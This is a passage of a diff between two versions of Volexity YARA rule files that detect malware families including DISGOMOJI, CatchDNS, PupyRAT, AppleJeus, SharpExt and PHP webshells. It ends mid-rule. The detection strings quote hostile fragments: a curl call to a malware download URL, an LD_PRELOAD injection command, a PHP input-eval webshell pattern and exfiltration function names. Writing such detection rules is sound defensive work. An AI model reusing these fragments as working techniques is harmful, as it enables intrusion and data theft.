+		reference = "https://github.com/elleven11/pantegana"
+		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2022/2022-06-15 DriftingCloud - Zero-Day Sophos Firewall Exploitation and an Insidious Breach/indicators/yara.yar#L89-L119"
 		license_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/LICENSE.txt"
-		logic_hash = "bb3a70dad28181534e27abbbd618165652c137264bfd3726ae4480c642493a3b"
+		logic_hash = "791a664a6b4b98051cbfacb451099de085cbab74d73771709377ab68a5a23d2b"
 		score = 75
 		quality = 80
-		tags = "STORMBAMBOO, FILE, MEMORY"
+		tags = "FILE, MEMORY"
+		hash1 = "8297c99391aae918f154077c61ea94a99c7a339166e7981d9912b7fdc2e0d4f0"
 		os = "all"
 		os_arch = "all"
 		scan_context = "file,memory"
-		severity = "critical"
+		severity = "high"
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 9530
-		version = 4
+		rule_id = 6631
+		version = 3
 
 	strings:
-		$s_1 = "def count_md5(src)"
-		$s_2 = "urllib.request.urlretrieve(image_url,main)"
-		$s_3 = "m1 != '4c8a326899272d2fe30e818181f6f67f'"
-		$s_4 = "os.path.split(os.path.realpath(__file__))[0]"
-		$s_5 = "r_v = os.system('curl '+ini_url+cc)"
-		$s_6 = "b41ef5f591226a0d5adce99cb2e629d8"
-		$s_7 = "1df495e7c85e59ad0de1b9e50912f8d0"
-		$s_8 = "tasklist | findstr mediainfo.exe"
-		$url_1 = "http://dl1.5kplayer.com/youtube/youtube_dl.png"
-		$url_2 = "http://dl1.5kplayer.com/youtube/youtube.ini?fire="
-		$path_1 = "C:\\\\ProgramData\\\\Digiarty\\\\mediainfo.exe"
+		$s1 = "RunFingerprinter" ascii
+		$s2 = "SendSysInfo" ascii
+		$s3 = "ExecAndGetOutput" ascii
+		$s4 = "RequestCommand" ascii
+		$s5 = "bindataRead" ascii
+		$s6 = "RunClient" ascii
+		$magic = "github.com/elleven11/pantegana" ascii
 
 	condition:
-		3 of ( $s_* ) or any of ( $url_* ) or $path_1
+		5 of ( $s* ) or $magic
 }
-rule VOLEXITY_Apt_Malware_Elf_Catchdns_Aug20_Memory : DRIFTINGBAMBOO FILE MEMORY
+rule VOLEXITY_Malware_Any_Pupyrat_B : FILE MEMORY
 {
 	meta:
-		description = "Looks for strings from CatchDNS component used to intercept and modify DNS responses, and likely also intercept/monitor http. This rule would only match against memory in the example file analyzed by Volexity."
+		description = "Detects the PUPYRAT malware family, a cross-platform RAT written in Python."
 		author = "threatintel@volexity.com"
-		id = "95306735-cdae-5407-ad49-d465d245378d"
-		date = "2020-08-20"
-		modified = "2024-08-02"
-		reference = "https://github.com/volexity/threat-intel"
-		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2024/2024-08-02 StormBamboo/rules.yar#L309-L383"
+		id = "ec8d0448-f47d-5c6e-bcf9-8f40ae83a96f"
+		date = "2022-04-07"
+		modified = "2025-03-21"
+		reference = "https://github.com/n1nj4sec/pupy"
+		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2022/2022-06-15 DriftingCloud - Zero-Day Sophos Firewall Exploitation and an Insidious Breach/indicators/yara.yar#L120-L157"
 		license_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/LICENSE.txt"
-		hash = "4f3d35f4f8b810362cbd4c59bfe5a961e559fe5713c9478294ccb3af2d306515"
-		logic_hash = "a7d677d7eecf388df7e7c2343fd3e46188594473c01075bf8a0b54292a51db94"
+		logic_hash = "f5b5f35ee783ff1163072591c6d48a85894729156935650a0fd166ae22a2ea00"
 		score = 75
-		quality = 55
-		tags = "DRIFTINGBAMBOO, FILE, MEMORY"
-		os = "linux"
+		quality = 80
+		tags = "FILE, MEMORY"
+		hash1 = "7474a6008b99e45686678f216af7d6357bb70a054c6d9b05e1817c8d80d536b4"
+		os = "all"
 		os_arch = "all"
-		report1 = "MAR-20221222"
-		report2 = "TIB-20231221"
 		scan_context = "file,memory"
 		severity = "critical"
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 227
-		version = 10
+		rule_id = 6689
+		version = 4
 
 	strings:
-		$os1 = "current thread policy=%d" ascii wide
-		$os2 = "OS_CreatShareMem %s-->%x" ascii wide
-		$os3 = "sem_open fail" ascii wide
-		$os4 = "int OS_GetCurRunPath(char*, int)" ascii wide
-		$os5 = "int OS_GetCurModName(char*, int)" ascii wide
-		$os6 = "int OS_StrToTime(char*, time_t*)" ascii wide
-		$os7 = "int OS_TimeToStr(time_t, char*)" ascii wide
-		$os8 = "int OS_TimeToStrYearMothDay(time_t, char*)" ascii wide
-		$os9 = "bool OS_Access(const char*)" ascii wide
-		$os10 = "int OS_Memicmp(const void*, const void*, unsigned int)" ascii wide
-		$os11 = "int OS_Mkdir(char*)" ascii wide
-		$os12 = "OS_ConnectSem" ascii wide
-		$msg1 = "client: last send packet iseq: %x, the ack :%x" ascii wide
-		$msg2 = "server: last send packet iseq: %x, the iseq :%x" ascii wide
-		$msg3 = "send packet failed!" ascii wide
-		$msg4 = "will hijack dns:%s, ip:%s " ascii wide
-		$msg5 = "dns send ok:%s" ascii wide
-		$msg6 = "tcp send ok" ascii wide
-		$msg7 = "FilePath:%s;" ascii wide
-		$msg8 = "Line:%d,Fun:%s,ErrorCode:%u;" ascii wide
-		$msg9 = "Description:%s;" ascii wide
-		$msg10 = "Line:%d,Fun:%s,ErrorCode:%u;" ascii wide
-		$msg11 = "get msg from ini is error" ascii wide
-		$msg12 = "on build eth send_msg or payload is null" ascii wide
-		$msg13 = "on build udp send_msg or payload is null" ascii wide
-		$conf1 = "%d.%d.%d.%d" ascii wide
-		$conf2 = "%s.tty" ascii wide
-		$conf3 = "dns.ini" ascii wide
-		$netw1 = "LISTEN_DEV" ascii wide
-		$netw2 = "SEND_DEV" ascii wide
-		$netw3 = "SERVER_IP" ascii wide
-		$netw4 = "DNSDomain" ascii wide
-		$netw5 = "IpLimit" ascii wide
-		$netw6 = "HttpConfig" ascii wide
-		$netw7 = "buildhead" ascii wide
-		$netw8 = "sendlimit" ascii wide
-		$netw9 = "content-type" ascii wide
-		$netw10 = "otherhead_" ascii wide
-		$netw11 = "configfile" ascii wide
-		$apache = {48 54 54 50 2F 31 2E 31 20 32 30 30 20 4F 4B 0D 0A 53 65 72 76 65 72 3A 20 41 70 61 63 68 65 0D 0A 43 6F 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 25 73 0D 0A 43 6F 6E 74 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 25 64 0D 0A}
-		$cpp1 = "src/os.cpp"
-		$cpp2 = "src/test_catch_dns.cpp"
+		$elf1 = "LD_PRELOAD=%s HOOK_EXIT=%d CLEANUP=%d exec %s 1>/dev/null 2>/dev/null" ascii
+		$elf2 = "reflective_inject_dll" fullword ascii
+		$elf3 = "ld_preload_inject_dll" fullword ascii
+		$pupy1 = "_pupy.error" ascii
+		$pupy2 = "pupy://" ascii
+		$s1 = "Args not passed" ascii
+		$s2 = "Too many args" ascii
+		$s3 = "Can't execute" ascii
+		$s4 = "mexec:stdin" ascii
+		$s5 = "mexec:stdout" ascii
+		$s6 = "mexec:stderr" ascii
+		$s7 = "LZMA error" ascii
 
 	condition:
-		9 of ( $os* ) or 3 of ( $msg* ) or all of ( $conf* ) or all of ( $netw* ) or $apache or all of ( $cpp* )
+		any of ( $elf* ) or all of ( $pupy* ) or all of ( $s* )
 }
-rule VOLEXITY_Apt_Malware_Linux_Disgomoji_Modules : TRANSPARENTJASMINE FILE MEMORY
+rule VOLEXITY_Susp_Php_Fileinput_Eval : FILE
 {
 	meta:
-		description = "Detects DISGOMOJI modules using strings in the ELF."
+		description = "Rule designed to detect PHP files which use file_get_contents() and then shortly afterwards use an eval statement."
 		author = "threatintel@volexity.com"
-		id = "b9e4ecdc-9b02-546f-9b79-947cb6b1f99a"
-		date = "2024-02-22"
-		modified = "2024-07-05"
-		reference = "TIB-20240229"
-		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2024/2024-06-13 DISGOMOJI/indicators/rules.yar#L1-L24"
+		id = "3e311677-22ea-5e5f-bdc6-dd67033d25a6"
+		date = "2021-06-16"
+		modified = "2024-12-12"
+		reference = "https://github.com/volexity/threat-intel"
+		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2022/2022-06-15 DriftingCloud - Zero-Day Sophos Firewall Exploitation and an Insidious Breach/indicators/yara.yar#L158-L181"
 		license_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/LICENSE.txt"
-		logic_hash = "7880288e3230b688b780bdfbac2b0761fd7831b7df233672c2242c21a86e1297"
-		score = 75
+		logic_hash = "de376bfdfa5b6244c414454cb5d43d29e3dd75e049389f0c430c160f9d198965"
+		score = 65
 		quality = 80
-		tags = "TRANSPARENTJASMINE, FILE, MEMORY"
-		hash1 = "2abaae4f6794131108adf5b42e09ee5ce24769431a0e154feabe6052cfe70bf3"
-		os = "linux"
+		tags = "FILE"
+		hash1 = "1a34c43611ee310c16acc383c10a7b8b41578c19ee85716b14ac5adbf0a13bd5"
+		hash2 = "6e8874c756c009c63f715a44ca72d0cb31dc25d87d7df6ca2830fe8330580342"
+		os = "win,linux"
 		os_arch = "all"
-		scan_context = "file,memory"
-		severity = "critical"
+		scan_context = "file"
+		severity = "high"
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 10270
-		version = 6
+		rule_id = 5581
+		version = 5
 
 	strings:
-		$s1 = "discord-c2/test/main/finalizing/Deliveries/ob_Delivery.go" wide ascii
-		$s2 = "discord-c2/test/main/finalizing/WAN_Conf.go" wide ascii
+		$s1 = "file_get_contents(\"php://input\")"
+		$s2 = "eval("
 
 	condition:
-		any of them
+		$s2 in ( @s1 [ 1 ] .. ( @s1 [ 1 ] + 512 ) )
 }
-rule VOLEXITY_Apt_Malware_Linux_Disgomoji_Loader : TRANSPARENTJASMINE FILE MEMORY
+rule VOLEXITY_Susp_Php_Call_User_Func : FILE
 {
 	meta:
-		description = "Detects DISGOMOJI loader using strings in the ELF."
+		description = "Webshells using call_user_func() function against an object from a file input or POST variable."
 		author = "threatintel@volexity.com"
-		id = "6d7848db-f1a5-5ccc-977a-7597b966a31c"
-		date = "2024-02-22"
-		modified = "2024-07-05"
-		reference = "TIB-20240229"
-		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2024/2024-06-13 DISGOMOJI/indicators/rules.yar#L25-L47"
+		id = "48c7857e-7dda-5e3f-b82c-7d34c251f083"
+		date = "2021-06-16"
+		modified = "2024-07-30"
+		reference = "https://zhuanlan.zhihu.com/p/354906657"
+		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2022/2022-06-15 DriftingCloud - Zero-Day Sophos Firewall Exploitation and an Insidious Breach/indicators/yara.yar#L182-L204"
 		license_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/LICENSE.txt"
-		logic_hash = "d9be4846bab5fffcfd60eaec377443819404f30ec088905c2ee26bd3b7525832"
-		score = 75
+		logic_hash = "46c999da97682023861e58f9cd2c8651480db990a0361c1985c6d5c35b5bf0ea"
+		score = 65
 		quality = 80
-		tags = "TRANSPARENTJASMINE, FILE, MEMORY"
-		hash1 = "51a372fee89f885741515fa6fdf0ebce860f98145c9883f2e3e35c0fe4432885"
-		os = "linux"
+		tags = "FILE"
+		hash1 = "40b053a2f3c8f47d252b960a9807b030b463ef793228b1670eda89f07b55b252"
+		os = "win,linux"
 		os_arch = "all"
-		scan_context = "file,memory"
-		severity = "critical"
+		scan_context = "file"
+		severity = "high"
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 10269
-		version = 7
+		rule_id = 5582
+		version = 4
 
 	strings:
-		$s1 = "discord-c2/test/main/delievery.go" wide ascii
+		$s1 = "@call_user_func(new C()" wide ascii
 
 	condition:
 		$s1
 }
-rule VOLEXITY_Apt_Malware_Linux_Disgomoji_Debug_String : TRANSPARENTJASMINE FILE MEMORY
+rule VOLEXITY_Apt_Malware_Js_Sharpext : SHARPPINE FILE MEMORY
 {
 	meta:
-		description = "Detects DISGOMOJI using strings in the ELF."
+		description = "A malicious Chrome browser extension used by the SharpPine threat actor to steal Gmail data from a victim."
 		author = "threatintel@volexity.com"
-		id = "eed2468f-7e50-5f3e-946a-277c10984823"
-		date = "2024-02-22"
-		modified = "2024-11-27"
-		reference = "TIB-20240229"
-		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2024/2024-06-13 DISGOMOJI/indicators/rules.yar#L48-L71"
+		id = "61b5176a-ff73-5fce-bc70-c9e09bb5afed"
+		date = "2021-09-14"
+		modified = "2025-05-21"
+		reference = "https://github.com/volexity/threat-intel"
+		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2022/2022-07-28 SharpTongue SharpTongue Deploys Clever Mail-Stealing Browser Extension SHARPEXT/yara.yar#L1-L52"
 		license_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/LICENSE.txt"
-		logic_hash = "6bb130eead39bd8128983e0f2e76cfeff8865ce8ed3cb73b132ed32d68fc0db0"
+		logic_hash = "0ed58c8646582ee36aeac650fac02d1e4962d45c0f6a24783c021d9267bed192"
 		score = 75
 		quality = 80
-		tags = "TRANSPARENTJASMINE, FILE, MEMORY"
-		hash1 = "d9f29a626857fa251393f056e454dfc02de53288ebe89a282bad38d03f614529"
-		os = "linux"
+		tags = "SHARPPINE, FILE, MEMORY"
+		hash1 = "1c9664513fe226beb53268b58b11dacc35b80a12c50c22b76382304badf4eb00"
+		hash2 = "6025c66c2eaae30c0349731beb8a95f8a5ba1180c5481e9a49d474f4e1bb76a4"
+		hash3 = "6594b75939bcdab4253172f0fa9066c8aee2fa4911bd5a03421aeb7edcd9c90c"
+		os = "all"
 		os_arch = "all"
 		scan_context = "file,memory"
 		severity = "critical"
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 10268
-		version = 9
+		rule_id = 5916
+		version = 5
 
 	strings:
-		$s1 = "discord-c2/test/main/payload.go" wide ascii
-		$s2 = "Desktop/Golang_Dev/Discord"
+		$s1 = "\"mode=attach&name=\"" ascii
+		$s2 = "\"mode=new&mid=\"" ascii
+		$s3 = "\"mode=attlist\"" ascii
+		$s4 = "\"mode=list\"" ascii
+		$s5 = "\"mode=domain\"" ascii
+		$s6 = "\"mode=black\"" ascii
+		$s7 = "\"mode=newD&d=\"" ascii
+		$mark1 = "chrome.runtime.onMessage.addListener" ascii
+		$mark2 = "chrome.webNavigation.onCompleted.addListener" ascii
+		$enc1 = "function BSue(string){" ascii
+		$enc2 = "function BSE(input){" ascii
+		$enc3 = "function bin2hex(byteArray)" ascii
+		$xhr1 = ".send(\"mode=cd1" ascii
+		$xhr2 = ".send(\"mode=black" ascii
+		$xhr3 = ".send(\"mode=domain" ascii
+		$xhr4 = ".send(\"mode=list" ascii
+		$manifest1 = "\"description\":\"advanced font\"," ascii
+		$manifest2 = "\"scripts\":[\"bg.js\"]" ascii
+		$manifest3 = "\"devtools_page\":\"dev.html\"" ascii
 
 	condition:
-		any of them
+		(5 of ( $s* ) and all of ( $mark* ) ) or all of ( $enc* ) or 3 of ( $xhr* ) or 2 of ( $manifest* )
 }
-rule VOLEXITY_Apt_Malware_Linux_Disgomoji_2 : TRANSPARENTJASMINE FILE MEMORY
+rule VOLEXITY_Apt_Malware_Win_Applejeus_Oct22 : LAZYPINE FILE MEMORY
 {
 	meta:
-		description = "Detects DISGOMOJI malware using strings in the ELF."
+		description = "Detects AppleJeus DLL samples."
 		author = "threatintel@volexity.com"
-		id = "609beb47-5e93-5f69-b89d-2cf62f20851a"
-		date = "2024-02-22"
-		modified = "2024-07-05"
-		reference = "TIB-20240229"
-		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2024/2024-06-13 DISGOMOJI/indicators/rules.yar#L72-L103"
+		id = "f88e2253-e296-57d8-a627-6cb4ccff7a92"
+		date = "2022-11-03"
+		modified = "2025-05-21"
+		reference = "https://github.com/volexity/threat-intel"
+		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2022/2022-12-01 Buyer Beware - Fake Cryptocurrency Applications Serving as Front for AppleJeus Malware/yara.yar#L1-L22"
 		license_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/LICENSE.txt"
-		logic_hash = "e03a774cca2946c1becdbd775ef465033dae089d578ea18a4f43fd7bdae9168e"
+		logic_hash = "46f3325a7e8e33896862b1971f561f4871670842aecd46bcc7a5a1af869ecdc4"
 		score = 75
 		quality = 80
-		tags = "TRANSPARENTJASMINE, FILE, MEMORY"
-		hash1 = "d9f29a626857fa251393f056e454dfc02de53288ebe89a282bad38d03f614529"
-		os = "linux"
+		tags = "LAZYPINE, FILE, MEMORY"
+		hash1 = "82e67114d632795edf29ce1d50a4c1c444846d9e16cd121ce26e63c8dc4a1629"
+		os = "win"
 		os_arch = "all"
 		scan_context = "file,memory"
 		severity = "critical"
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 10266
-		version = 9
+		rule_id = 8495
+		version = 3
 
 	strings:
-		$s1 = "downloadFileFromURL" wide ascii
-		$s2 = "createCronJob" wide ascii
-		$s3 = "findAndSendFiles" wide ascii
-		$s4 = "updateLogFile" wide ascii
-		$s5 = "handleZipFile" wide ascii
-		$s6 = "takeScreenshot" wide ascii
-		$s7 = "zipFirefoxProfile" wide ascii
-		$s8 = "zipDirectoryWithParts" wide ascii
-		$s9 = "uploadAndSendToOshi" wide ascii
-		$s10 = "uploadAndSendToLeft" wide ascii
+		$s1 = "HijackingLib.dll" ascii
 
 	condition:
-		7 of them
+		$s1
 }
-rule VOLEXITY_Apt_Malware_Linux_Disgomoji_1 : TRANSPARENTJASMINE FILE MEMORY
+rule VOLEXITY_Apt_Malware_Win_Applejeus_B_Oct22 : LAZYPINE FILE MEMORY
 {
 	meta:
-		description = "Detects GOMOJI malware using strings in the ELF."
+		description = "Detects unpacked AppleJeus samples."
 		author = "threatintel@volexity.com"
-		id = "f6643e9a-ca41-57e0-9fce-571d340f1cfe"
-		date = "2024-02-22"
-		modified = "2024-07-05"
-		reference = "TIB-20240229"
-		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2024/2024-06-13 DISGOMOJI/indicators/rules.yar#L104-L131"
+		id = "8586dc64-225b-5f28-a6d6-b9b6e8f1c815"
+		date = "2022-11-03"
+		modified = "2025-05-21"
+		reference = "https://www.volexity.com/blog/2022/12/01/buyer-beware-fake-cryptocurrency-applications-serving-as-front-for-applejeus-malware/"
+		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2022/2022-12-01 Buyer Beware - Fake Cryptocurrency Applications Serving as Front for AppleJeus Malware/yara.yar#L24-L54"
 		license_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/LICENSE.txt"
-		logic_hash = "dd3535079881ae9cfe25c129803668cb595be89b7f62eb82af19cc3839f92b6d"
+		logic_hash = "76f3c9692ea96d3cadbbcad03477ab6c53445935352cb215152b9b5483666d43"
 		score = 75
 		quality = 80
-		tags = "TRANSPARENTJASMINE, FILE, MEMORY"
-		hash1 = "d9f29a626857fa251393f056e454dfc02de53288ebe89a282bad38d03f614529"
-		os = "linux"
+		tags = "LAZYPINE, FILE, MEMORY"
+		hash1 = "9352625b3e6a3c998e328e11ad43efb5602fe669aed9c9388af5f55fadfedc78"
+		os = "win"
 		os_arch = "all"
 		scan_context = "file,memory"
 		severity = "critical"
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 10265
-		version = 7
+		rule_id = 8497
+		version = 5
 
 	strings:
-		$s1 = "Session *%s* opened!" wide ascii
-		$s2 = "uevent_seqnum.sh" wide ascii
-		$s3 = "Error downloading shell script: %v" wide ascii
-		$s4 = "Error setting execute permissions: %v" wide ascii
-		$s5 = "Error executing shell script: %v" wide ascii
-		$s6 = "Error creating Discord session" wide ascii
+		$key1 = "AppX7y4nbzq37zn4ks9k7amqjywdat7d"
+		$key2 = "Gd2n5frvG2eZ1KOe"
+		$str1 = "Windows %d(%d)-%s"
+		$str2 = "&act=check"
 
 	condition:
-		4 of them
+		( any of ( $key* ) and 1 of ( $str* ) ) or all of ( $str* )
 }
-rule VOLEXITY_Apt_Malware_Linux_Disgomoji_Bogus_Strings : TRANSPARENTJASMINE FILE
+rule VOLEXITY_Apt_Malware_Win_Applejeus_C_Oct22 : LAZYPINE MEMORY
 {
 	meta:
-		description = "Detects the DISGOMOJI malware using bogus strings introduced in the newer version."
+		description = "Detects unpacked AppleJeus samples."
 		author = "threatintel@volexity.com"
-		id = "ecff8d3c-d4fe-5b6d-a227-6ff531cf8e2b"
-		date = "2024-03-14"
-		modified = "2024-07-05"
-		reference = "TIB-20240318"
-		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2024/2024-06-13 DISGOMOJI/indicators/rules.yar#L132-L159"
+		id = "c9cbddde-220c-5e26-8760-85c29b98bfeb"
+		date = "2022-11-03"
+		modified = "2023-09-28"
+		reference = "https://www.volexity.com/blog/2022/12/01/buyer-beware-fake-cryptocurrency-applications-serving-as-front-for-applejeus-malware/"
+		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2022/2022-12-01 Buyer Beware - Fake Cryptocurrency Applications Serving as Front for AppleJeus Malware/yara.yar#L57-L84"
 		license_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/LICENSE.txt"
-		logic_hash = "0d8a2b371ffb182e60a8cc0cc500d1a9f906718a55f23f35f6c12f7faabbe971"
+		logic_hash = "a9e635d9353c8e5c4992beba79299fb889a7a3d5bc3eaf191f8bb7f51258a6c6"
 		score = 75
 		quality = 80
-		tags = "TRANSPARENTJASMINE, FILE"
-		hash1 = "8c8ef2d850bd9c987604e82571706e11612946122c6ab089bd54440c0113968e"
-		os = "linux"
+		tags = "LAZYPINE, MEMORY"
+		hash1 = "a0db8f8f13a27df1eacbc01505f311f6b14cf9b84fbc7e84cb764a13f001dbbb"
+		os = "win"
 		os_arch = "all"
-		scan_context = "file"
+		scan_context = "memory"
 		severity = "critical"
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 10341
-		version = 5
+		rule_id = 8519
+		version = 3
 
 	strings:
-		$s1 = "Graphics Display Rendering" wide ascii
-		$s2 = "Error fetching Repository Key: %v" wide ascii
-		$s3 = "Error reading Repository Key: %v" wide ascii
-		$s4 = "Error fetching dpkg: %v" wide ascii
-		$s5 = "GNU Drivers Latest version v1.4.2" wide ascii
-		$s6 = "ps_output.txt" wide ascii
+		$str1 = "%sd.e%sc \"%s > %s 2>&1\"" wide
+		$str2 = "tuid"
+		$str4 = "payload"
+		$str5 = "fconn"
+		$str6 = "Mozilla_%lu"
 
 	condition:
-		all of them
+		5 of ( $str* )
 }
-rule VOLEXITY_Apt_Malware_Linux_Disgomoji_Script_Uevent_Seqnum : TRANSPARENTJASMINE FILE
+rule VOLEXITY_Apt_Malware_Win_Applejeus_D_Oct22 : LAZYPINE FILE MEMORY
 {
 	meta:
-		description = "Detects a script deployed as part of DISGOMOJI malware chain."
+		description = "Detected AppleJeus unpacked samples."
 		author = "threatintel@volexity.com"
-		id = "9df61164-6a92-5042-ba4f-64dc7e998283"
-		date = "2024-03-07"
-		modified = "2024-07-05"
-		reference = "TIB-20240318"
-		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2024/2024-06-13 DISGOMOJI/indicators/rules.yar#L160-L187"
+		id = "80d2821b-a437-573e-9e9d-bf79f9422cc9"
+		date = "2022-11-10"
+		modified = "2025-05-21"
+		reference = "https://www.volexity.com/blog/2022/12/01/buyer-beware-fake-cryptocurrency-applications-serving-as-front-for-applejeus-malware/"
+		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2022/2022-12-01 Buyer Beware - Fake Cryptocurrency Applications Serving as Front for AppleJeus Malware/yara.yar#L87-L112"
 		license_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/LICENSE.txt"
-		logic_hash = "e390e83d9fc15499c9f32ad47d1c526273105602bda7b3532720b0a3f6abc835"
+		logic_hash = "23c0642e5be15a75a39d089cd52f2f14d633f7af6889140b9ec6e53c5c023974"
 		score = 75
 		quality = 80
-		tags = "TRANSPARENTJASMINE, FILE"
-		hash1 = "98b24fb7aaaece7556aea2269b4e908dd79ff332ddaa5111caec49123840f364"
-		os = "linux"
+		tags = "LAZYPINE, FILE, MEMORY"
+		hash1 = "a241b6611afba8bb1de69044115483adb74f66ab4a80f7423e13c652422cb379"
+		os = "win"
 		os_arch = "all"
-		scan_context = "file"
+		scan_context = "file,memory"
 		severity = "critical"
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 10314
-		version = 6
+		rule_id = 8534
+		version = 3
 
 	strings:
-		$s1 = "USB_DIR=\"/media/$USER\"" wide ascii
-		$s2 = "RECORD_FILE=\"record.txt\"" wide ascii
-		$s3 = "copy_files()" wide ascii
-		$s4 = "Check for connected USB drives" wide ascii
-		$s5 = "Check if filename already exists in record.txt" wide ascii
-		$s6 = "Function to copy files from USB drive to destination folder" wide ascii
+		$reg = "Software\\Bitcoin\\Bitcoin-Qt"
+		$pattern = "%s=%d&%s=%s&%s=%s&%s=%d"
+		$exec = " \"%s\", RaitingSetupUI "
+		$http = "Accept: */*" wide
 
 	condition:
-		3 of them
+		all of them
 }
-rule VOLEXITY_Apt_Malware_Linux_Disgomoji_Script_Lan_Conf : TRANSPARENTJASMINE FILE
+rule VOLEXITY_Apt_Delivery_Macro_Lazypine_Jeus_B : LAZYPINE FILE
 {
 	meta:
-		description = "Detects a script deployed as part of DISGOMOJI malware chain."
+		description = "Detects macros used by the LazyPine threat actor to distribute AppleJeus."
 		author = "threatintel@volexity.com"
-		id = "b338b3cf-22ce-5767-bdea-503e883bc84b"
-		date = "2024-03-07"
-		modified = "2024-07-05"
-		reference = "TIB-20240318"
-		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2024/2024-06-13 DISGOMOJI/indicators/rules.yar#L188-L215"
+		id = "ac4d4e82-e29f-5134-999d-b8dcef59d285"
+		date = "2022-11-03"
+		modified = "2025-05-21"
+		reference = "https://github.com/volexity/threat-intel"
+		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2022/2022-12-01 Buyer Beware - Fake Cryptocurrency Applications Serving as Front for AppleJeus Malware/yara.yar#L114-L139"
 		license_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/LICENSE.txt"
-		logic_hash = "2a19d5cff7adc9b1b92538a5df4e3cadea694f925f65080f5093fc5425e840f4"
+		logic_hash = "e55199e6ad26894f98e930cd4716127ee868872d08ada1c44675e4db1ec27894"
 		score = 75
 		quality = 80
-		tags = "TRANSPARENTJASMINE, FILE"
-		hash1 = "0b5cf9bd917f0af03dd694ff4ce39b0b34a97c9f41b87feac1dc884a684f60ef"
-		os = "linux"
+		tags = "LAZYPINE, FILE"
+		hash1 = "17e6189c19dedea678969e042c64de2a51dd9fba69ff521571d63fd92e48601b"
+		os = "win"
 		os_arch = "all"
 		scan_context = "file"
 		severity = "critical"
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 10312
-		version = 7
+		rule_id = 8493
+		version = 3
 
 	strings:
-		$s1 = "add_lan_conf_cron_if_not_exists" wide ascii
-		$s2 = "download_if_not_exists" wide ascii
-		$s3 = "add_cron_if_not_exists" wide ascii
-		$s4 = "uevent_seqnum.sh" wide ascii
-		$s5 = "$HOME/.x86_64-linux-gnu" wide ascii
-		$s6 = "lanConfScriptPath" wide ascii
+		$a1 = ", vbDirectory) = \"\" Then" ascii
+		$a2 = ".Caption & " ascii
+		$a3 = ".nodeTypedValue" ascii
+		$a4 = ".Application.Visible = False" ascii
+		$a5 = " MkDir (" ascii
 
 	condition:
-		4 of them
+		all of ( $a* )
 }
-rule VOLEXITY_Malware_Golang_Discordc2_Bmdyy_1 : FILE MEMORY
+rule VOLEXITY_Apt_Delivery_Office_Macro_Lazypine_Jeus : LAZYPINE FILE
 {
 	meta:
-		description = "Detects a opensource malware available on github using strings in the binary. The DISGOMOJI malware family used by TransparentJasmine is based on this malware."
